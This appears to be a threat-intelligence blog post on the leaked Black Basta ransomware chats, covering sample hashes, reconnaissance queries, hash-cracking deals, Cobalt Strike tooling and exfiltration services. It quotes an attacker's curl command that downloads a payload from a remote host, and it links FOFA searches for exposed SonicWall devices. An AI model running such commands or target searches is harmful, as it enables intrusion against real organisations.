https://bazaar.abuse.ch/sample/f4be945a6678a11bc4d2e3819cba8b91665eaf99e152cf0348e16d1fd94b2e75/
https://bazaar.abuse.ch/sample/6199895decf1e8dd173ffeb8818fe49069c2a53fd446e2b32de4c8dda99a79de/
https://bazaar.abuse.ch/sample/150db7e3c65a152c3a056733e8b42451ff22f13b10c6676bf4933d6f4e0797ad/
https://bazaar.abuse.ch/sample/c5793613219a782eb08205921a3f9ed97c2c74de18e0cd36008046d1a5e1288e/
https://bazaar.abuse.ch/sample/4899cdb23cf206532e2ccfe1eb170256012e2ee7664a89e5472e52f2a6274001/
https://bazaar.abuse.ch/sample/dddd96d33d61b8ed958455ce58442f2225f81a5f215525f143e48220fd47ac86/
https://bazaar.abuse.ch/sample/462c92282bd4dff657faf6de04a6da96572bfad06bae7ecb15c922c74be96b30/
https://bazaar.abuse.ch/sample/c111221c3c59b9f9c50d57c3880a4c09ecbc358e5bbe69e44b3945660ceb07bb/
https://bazaar.abuse.ch/sample/336f7e8de57d29f4360210eaf46b33b414c0c22bd0bdadf5bdecbdf46474d898/
https://bazaar.abuse.ch/sample/ff67692abc453dbbc9c8d70bb6d623197171fd4604d82b6adccc53c2e1db4d9b/
https://bazaar.abuse.ch/sample/a30798880eab8c6158073a38e63d5c014de3976e623e38c29b65dc1e6b0be3ef/
https://bazaar.abuse.ch/sample/a633ede541f3b86835ba11aea4278db5b37bb7040a6bb81f057819c0fafcdc99/
https://bazaar.abuse.ch/sample/d26ab01b293b2d439a20d1dffc02a5c9f2523446d811192836e26d370a34d1b4/
https://bazaar.abuse.ch/sample/3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac/
https://bazaar.abuse.ch/sample/3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac/

VTDIFF: https://www.virustotal.com/gui/diffs/detail/21507568815

DarkGate

• File Formats: PDF and MSI
• Samples referenced:
  • PDF: 74c69940f96ccad21c7bfa75d6ee8dec4a78b16e0a32abe104d24c2076a574d5
  • MSI: 693ff5db0a085db5094bb96cd4c0ce1d1d3fdc2fbf6b92c32836f3e61a089e7a

PikaBot

• File Formats: JS and EXE
• Samples referenced:
  • JS: ce616c5d472d8d22169e1cabd8c99a511394b1c28febc944f427137a0354e8db
  • EXE: f4be945a6678a11bc4d2e3819cba8b91665eaf99e152cf0348e16d1fd94b2e75

Wshrat

• File Formats: JS
• Samples referenced:
  • JS: 6199895decf1e8dd173ffeb8818fe49069c2a53fd446e2b32de4c8dda99a79de

RemcosRAT

• File Formats: IMG and CAB
• Samples referenced:
  • IMG: 150db7e3c65a152c3a056733e8b42451ff22f13b10c6676bf4933d6f4e0797ad
  • CAB: c5793613219a782eb08205921a3f9ed97c2c74de18e0cd36008046d1a5e1288e

GuLoader

• File Formats: VBS
• Samples referenced:
  • VBS #1: 4899cdb23cf206532e2ccfe1eb170256012e2ee7664a89e5472e52f2a6274001
  • VBS #2: dddd96d33d61b8ed958455ce58442f2225f81a5f215525f143e48220fd47ac86

Other / Unspecified Malware

• The logs also reference additional individual samples without a specific malware family name. These include:
  • LNK: 462c92282bd4dff657faf6de04a6da96572bfad06bae7ecb15c922c74be96b30
  • EXE in RAR: c111221c3c59b9f9c50d57c3880a4c09ecbc358e5bbe69e44b3945660ceb07bb
  • MSI: 336f7e8de57d29f4360210eaf46b33b414c0c22bd0bdadf5bdecbdf46474d898
  • HTA: ff67692abc453dbbc9c8d70bb6d623197171fd4604d82b6adccc53c2e1db4d9b
  • DOC: a30798880eab8c6158073a38e63d5c014de3976e623e38c29b65dc1e6b0be3ef
  • RTF (2017 CVE): a633ede541f3b86835ba11aea4278db5b37bb7040a6bb81f057819c0fafcdc99

Additional “Backdoor” Sample

• One sample is specifically called out as a “backdoor” but no clear family name is given:
  • 3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac

Reconnaissance

In the conversations we analysed, we identified discussions regarding the use of Shodan, Fofa, and ZoomInfo for information gathering. In this context, participants were conducting reconnaissance to gather data about their targets, which could subsequently be exploited.

• Shodan & Fofa & ZoomEye – Used for scanning endpoints that are exposed to the internet. Reconnaissance is very important part of the attack, and the users lapa and gg seems to be the main fan of the tools, sharing a lot of output:

citrix_us_fofa.txt

checkpoint_eu_fofa.txt
checkpoint_ca_fofa.txt
checkpoint_us_fofa.txt

screenconnect_gb_fofa.json
screenconnect_gb_fofa.txt
screenconnect_de_fofa.txt
screenconnect_de_fofa.json
screenconnect_au_fofa.txt
screenconnect_ch_fofa.txt
screenconnect_ch_fofa.json
screenconnect_nz_fofa.txt
screenconnect_nz_fofa.json
screenconnect_us_fofa.txt
screenconnect_us_fofa.json
screenconnect_ca_fofa.txt
screenconnect_ca_fofa.json
screenconnect_au_fofa.json
screenconnect_fofa.tar.gz

pulse_us_fofa.txt
pulse_ca_fofa.txt
pulse_eu_fofa.txt

rdweb_eu_fofa.txt
rdweb_ca_fofa.txt
rdweb_us_fofa.txt

sonicwall_us_fofa.txt "he has 300k of them here" https://en.fofa.info/result?qbase64=InNvbmljd2FsbCIgJiYgY291bnRyeT0iVVMi

sonicwall_us_zoomeye.tar.gz
SonicWALL_CA_zoomeye.tar.gz
Jenkins_US_zoomeye.tar.gz
Jenkins_ca&gb&de&au&ch&nz_zoomeye.tar.gz

Current Report of the Shodan Search looking to find Outlook Web Application(OWA): Shodan Search

Figure 7: Shodan

And FOFA for the same:

Figure 8: FoFa Search 1

Simple FOFA Search employed by Black Basta targeting US SonicWall customers: FOFA Search Engine

Figure 9: Fofa Search 2

Link appearing to a public github repository of https://github.com/netsecfish, targeting D-Link ShareCenter Cloud Storage (NAS):

Figure 10: Fofa Search 3 – https://github.com/netsecfish/dlink/blob/main/fofa-result.png

• ZoomInfo – Likely used for gathering intelligence on the target organisation.

Initial Access & Credential Exploitation

• Hash Cracking Services – @usernameboy joined the forum and @usernamegg asked for a price regarding NTLM Hashes, with the price of 300 (assumed USD)

usernamegg,"I found the request
usernamegg,"okay
usernamegg,I can't figure it out yet
usernamegg,on a single connection
usernameboy,"Yes
usernameboy,Hi
usernameboy,we need to agree on the price for this type of hash netntlm >ntlm
usernamegg,dp
usernamegg,come on
usernamegg,what's the price?
usernameboy,I think 300
usernameboy,we need a full brute force there
usernameboy,100 for 3
usernamegg,okay
usernamegg,come on
usernamegg,300 let's try to start
usernamegg,well,did you understand how to decrypt them?
usernameboy,Yes,I know
usernameboy,I've been looking for this more than once
usernamegg,has anyone ordered this from you before?
usernamegg,were there any successful finds?
usernameboy,"Yes
usernameboy,found
usernamegg,"well yes
usernameboy,only it takes time
usernamegg,yes
usernamegg,okay
usernamegg,how long did it take you to find + -?
usernameboy,Yes it varies but 6 hours minimum
usernamegg,what kind of power do you have?
usernamegg,so I can roughly understand
usernamegg,what cards are worth
usernamegg,?
usernameboy,4090
usernameboy,I'll help a hunter set up a brute force)
usernamegg,#NAME?
usernamegg,come on
usernamegg,is he bothering you?
usernamegg, he also has normal abilities
usernameboy,"he doesn't know how to
usernamegg,#NAME?
usernamegg,will you decipher it in the end?
usernameboy,Yes, we are looking for
usernamegg,ntlm should get
usernameboy,Yes
usernamegg,ok
usernameboy,"There is ntlm
usernamegg,let's go to the general chat
usernameboy,already there
usernameboy,Hi

• Used to crack NTLMv1 hashes​ or attempted to crack password hashes themselves, but paying for services could speed up the process.
• Jenkins & RDP Targeting – Indicators suggest exploitation of exposed Jenkins servers and RDP access points​.
• Social Engineering via IT Calls – Impersonation of IT departments for credential theft​.

Malware Deployment & Execution

• JavaScript in Malware – Leveraged for execution and persistence​.
• DLL-based Malware – Use of DLL injection methods linked to Qbot variants​.
• Cobalt Strike – Likely used for command and control (C2), with Malleable C2 profiles observed​.
• VBS & MSI Scripts – One of the more intriguing aspects of the discussions was Black Basta’s transition from using MSI file types to VBS scripts. They utilised a service called temp[.]sh to host these files online, enabling them to be embedded within malicious scripts for deployment.

The internal discussion regarding Black Basta focuses on MSI and VBS scripts, along with various other topics.

## September 21, 2023
**@usernamegg**  
> We can try MSI with LNK. Need to test.  
> VBS should be clean only by Monday.  
> Or I can try to clean up this VBS.  
> Let's clean it up.  
**@w**  
> Do you have MSI or VBS?  
> I have LNK ready immediately for MSI too.  
---
## September 26, 2023
**@usernamegg**  
> [11:16:35] True PDF + XLL: What is being distributed right now—VBS or MSI?  
---
## September 28, 2023
**@w**  
> Testing VBS.  
> Will rework LNK now.  
> If VBS turns out bad.  
**@usernamegg**  
> Everything should be fine with VBS.  
---
## October 2, 2023
**@lapa**  
> What does XLL execute, MSI or VBS?  
**@usernamegg**  
> VBS.  
---
## October 4, 2023
**@usernamegg**  
> I can only build one VBS.  
**@lapa**  
> Right now, we are distributing zip + VBS.  
---
## October 9, 2023
**@usernamegg**  
> The old MSI build was taken down.  
> Once I link a new domain to a new server where the new software is,  
> I'll distribute MSI and VBS from there.  
> We’ll see which works better.  
> I think VBS is better, but the execution method in the file will be different.  
---
## October 10, 2023
**@lapa**  
> At least VBS gives a warning.  
> MSI doesn't seem to.  
**@usernamegg**  
> I'm taking the certificates and making VBS.  
---
## October 16, 2023
**@w**  
> It was slightly different in VBS.  
> The VBS script downloaded a simple command from the panel,  
> like `cmd.exe /c curl.exe http[:]//domain.com:2351/adfguwie4 -O autoit.exe`,  
> and just executed it.  

Figure 11: Fire Hosting Service

Cobalt Strike Arsenal kit

The collection of customizable tools that enable users to better simulate real-world adversary tactics and techniques. – https://www.cobaltstrike.com/product/features

.
├── arsenal_kit.cna [32K]
├── artifact [4.0K]
│   ├── artifact32big.dll [455K]
│   ├── artifact32big.exe [456K]
│   ├── artifact32.dll [42K]
│   ├── artifact32.exe [42K]
│   ├── artifact32svcbig.exe [452K]
│   ├── artifact32svc.exe [38K]
│   ├── artifact64big.exe [454K]
│   ├── artifact64big.x64.dll [454K]
│   ├── artifact64.exe [42K]
│   ├── artifact64svcbig.exe [450K]
│   ├── artifact64svc.exe [38K]
│   ├── artifact64.x64.dll [42K]
│   ├── artifact.cna [9.3K]
│   ├── paygen_big.py [9.7K]
│   ├── sgn [7.9M]
│   └── sgn.conf [557]
├── mimikatz [4.0K]
│   ├── mimikatz-chrome.x64.dll [755K]
│   ├── mimikatz-chrome.x86.dll [624K]
│   ├── mimikatz.cna [1.2K]
│   ├── mimikatz-full.x64.dll [794K]
│   ├── mimikatz-full.x86.dll [688K]
│   ├── mimikatz-max.x64.dll [1.4M]
│   ├── mimikatz-max.x86.dll [1.1M]
│   ├── mimikatz-min.x64.dll [306K]
│   └── mimikatz-min.x86.dll [270K]
├── process_inject [4.0K]
│   ├── processinject.cna [3.2K]
│   ├── process_inject_explicit.x64.o [2.0K]
│   ├── process_inject_explicit.x86.o [2.1K]
│   ├── process_inject_spawn.x64.o [1.7K]
│   └── process_inject_spawn.x86.o [1.7K]
├── resource [4.0K]
│   ├── compress.ps1 [205]
│   ├── resources.cna [6.5K]
│   ├── template.exe.hta [830]
│   ├── template.hint.x64.ps1 [2.7K]
│   ├── template.hint.x86.ps1 [2.8K]
│   ├── template.psh.hta [197]
│   ├── template.py [635]
│   ├── template.vbs [1017]
│   ├── template.x64.ps1 [2.3K]
│   ├── template.x86.ps1 [2.4K]
│   └── template.x86.vba [3.8K]
├── sleepmask [4.0K]
│   ├── sleepmask.cna [1.6K]
│   ├── sleepmask_pivot.x64.o [1.4K]
│   ├── sleepmask_pivot.x86.o [1.4K]
│   ├── sleepmask.x64.o [1.2K]
│   └── sleepmask.x86.o [1.2K]
└── udrl [4.0K]
    ├── ReflectiveLoader.x64.o [3.2K]
    ├── ReflectiveLoader.x86.o [2.7K]
    └── udrl.cna [11K]

Exploitation & Privilege Escalation

• Microsoft Outlook RCE Exploit – This zero-click vulnerability in Outlook allows for remote code execution without user interaction.
• Windows 10 RCE Exploit – A technique that circumvents ASLR/DEP protections, enabling remote execution of code.
• ESXi Server Targeting – A report from Microsoft back in 2024 highlights a concerning trend: cybercriminals are exploiting vulnerabilities in ESXi servers to deploy ransomware. This malicious activity poses significant risks to organisations relying on these servers. For more information, you can read the full article on Exploiting ESXI servers to deploy ransomware.
• SearchProtocolHost.exe Abuse – The exploitation of Windows system process for the covert execution of malicious activities is a significant concern. This process is often targeted for techniques such as Process Hollowing, which is a specific sub-technique within the broader category of Process Injection.
• Use of Proof of Concept Exploits:
• CVEs mentioned in the discussions or references and their age at the time of mention

The group seems to focus on both emerging vulnerabilities and previously identified ones during their discussions:

Command & Control (C2) Infrastructure

• Custom C2 Frameworks – This section delves into the creation of tailored Command and Control (C2) infrastructures.
• SOCKS Proxy Services – These services are employed for traffic obfuscation and tunnelling purposes.
• HTTP & DNS Beacons – These may be linked to configurations used in Cobalt Strike.

File Hosting & Data Exfiltration

• File-sharing Services Used:
  • hxxps://send.vis[.]ee – Free File sharing service – (Still operational at the time of writing this blog)​
  • hxxps://transfer[.]sh – Open Source file sharing platform.
  • hxxp://temp[.]sh – At the time of writing this blog, the service still remains operational. For further details, please refer to Figure 1 located in the subsection titled “Malware Deployment & Execution.”
  • FTP has been widely used and SFTP has become more prominent over time

• Leak SiteOnion addresses
  • Over 400 messages appear to mention .onion sites, both basta, lockbit, rhysida and other addresses primarily for victim leak communication, and other leak forums.

MITRE Techniques

The analysis of the conversations revealed several discussions focused on specific operations. We can interpret these findings through the tactics outlined in the MITRE Framework. The graph below illustrates the tactics identified from the conversations in the leaked bestflowers.json dataset.

Figure 12: Black Basta MITRE Techniques

Conclusion

The leaked conversations of Black Basta provide a rare and valuable glimpse into the inner workings of a ransomware group. Their structured approach uses advanced tactics and a methodical strategy for victim selection, demonstrating a high level of operational sophistication.

Despite recent inactivity, the data suggests internal conflicts rather than a complete shutdown, meaning Black Basta or its key members could resurface under a different guise. Their operational model aligns with other major ransomware groups, focusing on financial gain through strategic targeting and calculated negotiations rather than indiscriminate disruption.

The attack chain typically begins with network reconnaissance, followed by exploitation of vulnerabilities in VPNs, firewalls, or phishing campaigns with malicious attachments. The group has been fairly interested in a wide variety of remote code execution(RCE) vulnerabilities.

Post-compromise, they employ credential stuffing, NTLM password cracking, and Cobalt Strike Arsenal kit both for lateral movement and persistence.

As part of the infrastructure they used proxy chains, file sharing services, TOR, and TOX for general communications.

For cybersecurity teams and law enforcement agencies, these insights emphasize the need for continuous monitoring, proactive threat intelligence, and improved security measures to counteract evolving ransomware threats. Organisations should prioritise robust authentication measures, endpoint and server protection, phishing awareness training, backups and network segmentation to mitigate the risks.

Sources

• https://www.microsoft.com/en-us/security/blog/2024/07/29/ransomware-operators-exploit-esxi-hypervisor-vulnerability-for-mass-encryption/
• https://github.com/dutchcoders/transfer.sh
• https://www.theregister.com/2025/02/21/experts_race_to_extract_intel/
• https://malpedia.caad.fkie.fraunhofer.de/actor/storm-0506
• https://malpedia.caad.fkie.fraunhofer.de/actor/ta2101
• https://malpedia.caad.fkie.fraunhofer.de/actor/unc4393
• https://ecrime.ch/
• https://x.com/PRODAFT/status/1892636346885235092